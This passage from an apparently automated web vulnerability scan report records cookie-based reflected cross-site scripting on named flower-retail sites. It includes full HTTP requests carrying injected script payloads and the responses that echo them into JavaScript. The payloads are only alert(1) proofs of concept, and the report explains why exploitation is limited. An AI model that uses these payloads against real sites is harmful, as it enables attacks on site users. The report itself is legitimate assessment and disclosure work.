1.125. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ef4</script><script>alert(1)</script>fc8f59adbce was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f48ef4</script><script>alert(1)</script>fc8f59adbce; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:41:57 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:41:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:41:57 GMT
Content-Length: 164424


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.links="30050119;30007363;30048203;30049945;41213;30043943;";
resx.itemid = "30050119";
resx.qty="1";
resx.price="29.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f48ef4</script><script>alert(1)</script>fc8f59adbce";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HIC";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

1.126. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59bff</script><script>alert(1)</script>8b3e455c6b7 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f59bff</script><script>alert(1)</script>8b3e455c6b7; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:59:25 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:59:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:59:25 GMT
Content-Length: 155561


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Product";
resx.links="30007357;30007828;41213;30043943;30050119;";
resx.itemid = "30007357";
resx.qty="1";
resx.price="29.98";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f59bff</script><script>alert(1)</script>8b3e455c6b7";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HPM";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

1.127. http://www.floristexpress.net/products/tulip_rainbow.htm [ref_code cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /products/tulip_rainbow.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8173"%3balert(1)//95ac6cbaf33c38076 was submitted in the ref_code cookie. This input was echoed as e8173";alert(1)//95ac6cbaf33c38076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/tulip_rainbow.htm?order_prod_num=FYF-MIXTUL&order_prod_size=r&order_upgrds%5Bm%5D%5Bqty%5D=&order_upgrds%5Bm%5D%5Bopt%5D=&order_upgrds%5Bl%5D%5Bqty%5D=&order_upgrds%5Bl%5D%5Bopt%5D=&order_upgrds%5Bc%5D%5Bopt%5D=&order_upgrds%5Bt%5D%5Bopt%5D=&order_d_card_type=Blank+Card&order_d_recip=&remLen=175&order_d_card_msg=&remChars=175&order_d_card_sig=&order_d_zip=&continue.x=66&continue.y=20 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://www.floristexpress.net/products/tulip_rainbow.htm
Cache-Control: max-age=0
Origin: http://www.floristexpress.net
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=IZJPJPS192.168.100.70CKOMM; PHPSESSID=be5eceddad9804e3c8f89291e0dce73f; ref_code=ORDe8173"%3balert(1)//95ac6cbaf33c38076; s_cc=true; s_sq=proflodevelopment%3D%2526pid%253Dfle%25253Aproduct%25253AFYF-MIXTUL%2526pidt%253D1%2526oid%253Dhttp%25253A//a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/btn_buynow.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:55:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c2d443072044e030c1ee1ec63640d40a; path=/
Content-Type: text/html
Content-Length: 32960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Tulip Rainbow at FloristExpress.Net<
...[SNIP]...
.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="10:30AM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="D";
s.eVar36="ORDe8173";alert(1)//95ac6cbaf33c38076";
s.eVar40="";
s.eVar47="";

s.products=";FYF-MIXTUL;;;event5=1;";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...
